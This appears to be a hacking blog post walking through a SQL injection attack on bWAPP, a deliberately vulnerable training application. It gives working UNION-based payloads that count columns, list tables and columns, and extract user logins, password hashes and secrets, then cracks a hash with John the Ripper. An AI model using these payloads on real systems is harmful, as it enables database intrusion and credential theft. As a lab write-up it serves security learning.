Exploit SQL Injection (GET/Search) flaw on BWAPP

In this post i will use bWAPP installed in bee-box to test sql injection flaw.

First,to understand what's SQL injection (SQLi) flaw,you can go to here!!!.I will show you a way to exploit this flaw.
Now,let's move,we're going to access bWAPP via browser (firefox,chrome,etc),then to login let enter username/password -> bee/bug.After logging you would to get like this.

Next,pick SQL Injection (GET/Search) vulnerability.

Click hack button,then you can see The search page.

If you leave empty the string to search, it will respond back the movie list in database.

Then i search a letter m with ' symbol and see what will i get?

 After pressing search,i got error message: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
 

This message mean we caught SQLi flaw,you could use the SQL union statement to merge database tables.
First of all you need to ensure that you use the same number of columns as the original SQL statement when using the SQL union statement! Use sql order to know how many columns is this db.

• m' order by 1-- -

if you press search and get msg: No movies were found! that mean that column is available in db,then you will try with other number,replace 1 with 2,3,4,5,6,7,... until you see this msg: Error: Unknown column 'int' in 'order clause' ('int' that is the latest number you had tried before)  that mean it is over column available.

In here,i got 7 columns.

Now,use union all select to select all 7 columns.

• m' union all select 1,2,3,4,5,6,7 -- -

No error caught,and that's great! Now we can play with the field order and visualize the current database version:

• m' union all select 1,database(),3,4,5,6,7 -- -

We have found the name the of the current database name: bWAPP
Now our mission is to retrieve the table names of the current database: 

• m' union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() -- -

I will pick users table,want to retrieve the column names for the table users ?

• m' union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users' and table_schema=database() -- -

I got 9 columns in users table,but i just want to see values of login,password and secret column.Let's see those values.

• m' union all select 1,login,password,secret,5,6,7 from users -- -

You can see in column bee we got sha1: 6885858486f31043e5839c735d99457f045affd0 next save this key in format .txt and use john (john the ripper) to see encrypt.

then i got "bug" word that's password of bee user.

End

There above i have just to shown you some basic command for play with database.SQL injection can have disastrous consequences, no doubt about it.Want to understand how to SQLi work i must to have good knowledge about mysql and database.Self-study and break the thing.

Share on Google Plus

About Anonymous

Captain running team to research about hacking,network,security and cyber field